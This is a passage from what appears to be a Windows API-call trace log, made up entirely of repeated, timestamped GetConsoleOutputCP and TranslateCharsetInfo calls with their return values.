GetConsoleOutputCP () returned 0x1b5 [0301.148] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.148] GetConsoleOutputCP () returned 0x1b5 [0301.171] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.171] GetConsoleOutputCP () returned 0x1b5 [0301.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.300] GetConsoleOutputCP () returned 0x1b5 [0301.383] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.383] GetConsoleOutputCP () returned 0x1b5 [0301.385] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.385] GetConsoleOutputCP () returned 0x1b5 [0301.386] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.386] GetConsoleOutputCP () returned 0x1b5 [0301.543] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.543] GetConsoleOutputCP () returned 0x1b5 [0301.825] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.825] GetConsoleOutputCP () returned 0x1b5 [0301.860] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.860] GetConsoleOutputCP () returned 0x1b5 [0301.867] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.867] GetConsoleOutputCP () returned 0x1b5 [0301.869] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.869] GetConsoleOutputCP () returned 0x1b5 [0301.872] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.872] GetConsoleOutputCP () returned 0x1b5 [0301.874] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.874] GetConsoleOutputCP () returned 0x1b5 [0301.999] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0301.999] GetConsoleOutputCP () returned 0x1b5 [0302.256] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.256] GetConsoleOutputCP () returned 0x1b5 [0302.402] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.402] GetConsoleOutputCP () returned 0x1b5 [0302.475] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.475] GetConsoleOutputCP () returned 0x1b5 [0302.498] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.498] GetConsoleOutputCP () returned 0x1b5 [0302.558] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.558] GetConsoleOutputCP () returned 0x1b5 [0302.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.652] GetConsoleOutputCP () returned 0x1b5 [0302.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.792] GetConsoleOutputCP () returned 0x1b5 [0302.950] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0302.950] GetConsoleOutputCP () returned 0x1b5 [0303.070] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0303.070] GetConsoleOutputCP () returned 0x1b5 [0303.309] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0303.309] GetConsoleOutputCP () returned 0x1b5 [0303.480] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0303.480] GetConsoleOutputCP () returned 0x1b5 [0303.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0303.809] GetConsoleOutputCP () returned 0x1b5 [0304.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.021] GetConsoleOutputCP () returned 0x1b5 [0304.029] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.029] GetConsoleOutputCP () returned 0x1b5 [0304.038] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.038] GetConsoleOutputCP () returned 0x1b5 [0304.058] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.058] GetConsoleOutputCP () returned 0x1b5 [0304.152] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.152] GetConsoleOutputCP () returned 0x1b5 [0304.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.232] GetConsoleOutputCP () returned 0x1b5 [0304.559] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.560] GetConsoleOutputCP () returned 0x1b5 [0304.666] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.667] GetConsoleOutputCP () returned 0x1b5 [0304.856] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.856] GetConsoleOutputCP () returned 0x1b5 [0304.963] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0304.963] GetConsoleOutputCP () returned 0x1b5 [0305.148] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0305.148] GetConsoleOutputCP () returned 0x1b5 [0305.321] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0305.321] GetConsoleOutputCP () returned 0x1b5 [0305.413] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0305.413] GetConsoleOutputCP () returned 0x1b5 [0305.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0305.465] GetConsoleOutputCP () returned 0x1b5 [0305.621] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0305.621] GetConsoleOutputCP () returned 0x1b5 [0305.940] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0305.940] GetConsoleOutputCP () returned 0x1b5 [0306.165] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.165] GetConsoleOutputCP () returned 0x1b5 [0306.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.422] GetConsoleOutputCP () returned 0x1b5 [0306.493] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.493] GetConsoleOutputCP () returned 0x1b5 [0306.495] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.495] GetConsoleOutputCP () returned 0x1b5 [0306.496] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.496] GetConsoleOutputCP () returned 0x1b5 [0306.496] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.496] GetConsoleOutputCP () returned 0x1b5 [0306.497] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.497] GetConsoleOutputCP () returned 0x1b5 [0306.497] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.497] GetConsoleOutputCP () returned 0x1b5 [0306.498] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.498] GetConsoleOutputCP () returned 0x1b5 [0306.498] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.498] GetConsoleOutputCP () returned 0x1b5 [0306.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.499] GetConsoleOutputCP () returned 0x1b5 [0306.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.499] GetConsoleOutputCP () returned 0x1b5 [0306.500] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.500] GetConsoleOutputCP () returned 0x1b5 [0306.500] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.500] GetConsoleOutputCP () returned 0x1b5 [0306.501] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.501] GetConsoleOutputCP () returned 0x1b5 [0306.501] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.501] GetConsoleOutputCP () returned 0x1b5 [0306.502] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.502] GetConsoleOutputCP () returned 0x1b5 [0306.502] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.502] GetConsoleOutputCP () returned 0x1b5 [0306.503] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.503] GetConsoleOutputCP () returned 0x1b5 [0306.503] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.503] GetConsoleOutputCP () returned 0x1b5 [0306.504] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.504] GetConsoleOutputCP () returned 0x1b5 [0306.504] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.504] GetConsoleOutputCP () returned 0x1b5 [0306.505] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.505] GetConsoleOutputCP () returned 0x1b5 [0306.506] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.506] GetConsoleOutputCP () returned 0x1b5 [0306.506] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.506] GetConsoleOutputCP () returned 0x1b5 [0306.507] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.507] GetConsoleOutputCP () returned 0x1b5 [0306.507] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.507] GetConsoleOutputCP () returned 0x1b5 [0306.508] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.508] GetConsoleOutputCP () returned 0x1b5 [0306.508] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.508] GetConsoleOutputCP () returned 0x1b5 [0306.509] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.509] GetConsoleOutputCP () returned 0x1b5 [0306.509] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.509] GetConsoleOutputCP () returned 0x1b5 [0306.510] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.510] GetConsoleOutputCP () returned 0x1b5 [0306.510] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.510] GetConsoleOutputCP () returned 0x1b5 [0306.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.511] GetConsoleOutputCP () returned 0x1b5 [0306.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.511] GetConsoleOutputCP () returned 0x1b5 [0306.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.512] GetConsoleOutputCP () returned 0x1b5 [0306.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.512] GetConsoleOutputCP () returned 0x1b5 [0306.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.513] GetConsoleOutputCP () returned 0x1b5 [0306.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.513] GetConsoleOutputCP () returned 0x1b5 [0306.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.514] GetConsoleOutputCP () returned 0x1b5 [0306.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.514] GetConsoleOutputCP () returned 0x1b5 [0306.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.515] GetConsoleOutputCP () returned 0x1b5 [0306.515] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.515] GetConsoleOutputCP () returned 0x1b5 [0306.515] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.515] GetConsoleOutputCP () returned 0x1b5 [0306.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.516] GetConsoleOutputCP () returned 0x1b5 [0306.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.517] GetConsoleOutputCP () returned 0x1b5 [0306.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.517] GetConsoleOutputCP () returned 0x1b5 [0306.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.518] GetConsoleOutputCP () returned 0x1b5 [0306.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.518] GetConsoleOutputCP () returned 0x1b5 [0306.519] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.519] GetConsoleOutputCP () returned 0x1b5 [0306.519] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.519] GetConsoleOutputCP () returned 0x1b5 [0306.520] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.520] GetConsoleOutputCP () returned 0x1b5 [0306.521] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.522] GetConsoleOutputCP () returned 0x1b5 [0306.522] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.522] GetConsoleOutputCP () returned 0x1b5 [0306.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.523] GetConsoleOutputCP () returned 0x1b5 [0306.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.523] GetConsoleOutputCP () returned 0x1b5 [0306.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.524] GetConsoleOutputCP () returned 0x1b5 [0306.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.524] GetConsoleOutputCP () returned 0x1b5 [0306.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.525] GetConsoleOutputCP () returned 0x1b5 [0306.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.525] GetConsoleOutputCP () returned 0x1b5 [0306.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.525] GetConsoleOutputCP () returned 0x1b5 [0306.526] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.526] GetConsoleOutputCP () returned 0x1b5 [0306.526] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.526] GetConsoleOutputCP () returned 0x1b5 [0306.527] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.527] GetConsoleOutputCP () returned 0x1b5 [0306.527] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.527] GetConsoleOutputCP () returned 0x1b5 [0306.528] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.528] GetConsoleOutputCP () returned 0x1b5 [0306.528] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.528] GetConsoleOutputCP () returned 0x1b5 [0306.529] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.529] GetConsoleOutputCP () returned 0x1b5 [0306.529] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.530] GetConsoleOutputCP () returned 0x1b5 [0306.530] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.530] GetConsoleOutputCP () returned 0x1b5 [0306.531] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.531] GetConsoleOutputCP () returned 0x1b5 [0306.531] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.531] GetConsoleOutputCP () returned 0x1b5 [0306.532] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.532] GetConsoleOutputCP () returned 0x1b5 [0306.532] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.532] GetConsoleOutputCP () returned 0x1b5 [0306.533] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.533] GetConsoleOutputCP () returned 0x1b5 [0306.533] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.533] GetConsoleOutputCP () returned 0x1b5 [0306.534] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.534] GetConsoleOutputCP () returned 0x1b5 [0306.534] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.534] GetConsoleOutputCP () returned 0x1b5 [0306.535] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.535] GetConsoleOutputCP () returned 0x1b5 [0306.535] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.535] GetConsoleOutputCP () returned 0x1b5 [0306.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.544] GetConsoleOutputCP () returned 0x1b5 [0306.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.544] GetConsoleOutputCP () returned 0x1b5 [0306.545] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.545] GetConsoleOutputCP () returned 0x1b5 [0306.545] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.545] GetConsoleOutputCP () returned 0x1b5 [0306.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.546] GetConsoleOutputCP () returned 0x1b5 [0306.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.546] GetConsoleOutputCP () returned 0x1b5 [0306.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.546] GetConsoleOutputCP () returned 0x1b5 [0306.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b83def8) returned 0 [0306.547] GetConsoleOutputCP () returned 0x1b5 [0306.547] TranslateCharsetInfo (in: 